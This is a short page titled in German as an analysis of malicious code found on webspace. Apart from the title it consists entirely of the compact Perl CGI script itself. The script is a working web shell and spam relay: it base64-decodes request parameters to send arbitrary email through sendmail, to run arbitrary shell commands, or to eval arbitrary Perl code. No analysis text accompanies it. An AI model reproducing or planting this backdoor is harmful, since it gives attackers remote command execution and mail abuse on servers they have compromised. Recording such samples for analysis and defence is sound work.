Analyse von Schadcode auf Webspace

#!/usr/bin/perl -w
use strict;sub b ($) {local($^W)=0;use integer;my $s=shift;$s=~tr|A-Za-z0-9+=/||cd;return "" if length($s) % 4;$s=~s/=+$//;$s=~tr|A-Za-z0-9+/| -_|;return "" if !length $s;my $u="";my($i,$l);$l=length($s)-60;for($i=0;$i<=$l;$i+=60){$u.="M".substr($s,$i,60);}$s=substr($s,$i);if($s ne ""){$u.=chr(32+length($s)*3/4).$s;}return unpack("u",$u);}sub m {my $r=30128+256;my $q={};my $s="";if($ENV{REQUEST_METHOD} eq "GET"){$s=$ENV{QUERY_STRING};}else{my $l=$ENV{CONTENT_LENGTH};exit unless $l;while($l > length $s){my $v=length $s;sysread(STDIN,$s,($l-$v),$v);}}foreach(split(/&/,$s)){my($k,$v)=split(/=/,$_,2);next if !defined $k || !length $k;$v="" if !defined $v;$v=~tr/+/ /;$v=~s/%([0-9A-Fa-f]{2})/chr(hex($1))/esg;$q->{$k}=$v;}print "Content-type: text/html; charset=iso-8859-1\x0D\x0A\x0D\x0A";if($q->{m}==0){print $r;exit;}if($q->{m}==1){if(open(M,"| /usr/sbin/sendmail -t > /dev/null")){print M sprintf("To: %s\x0D\x0ASubject: %s\x0D\x0A%s",&b($q->{a}),&b($q->{b}),&b($q->{c}));close M;print $r;}exit;}if($q->{m}==2){use IPC::Open2 qw(open2);local $SIG{PIPE}=sub {exit};my($o,$i);my $p=open2 $o,$i,&b($q->{a});print $i &b($q->{b});close $i;print while(<$o>);close $o;waitpid($p,0);exit;}if($q->{m}==3){eval(&b($q->{a}));exit;}}&m();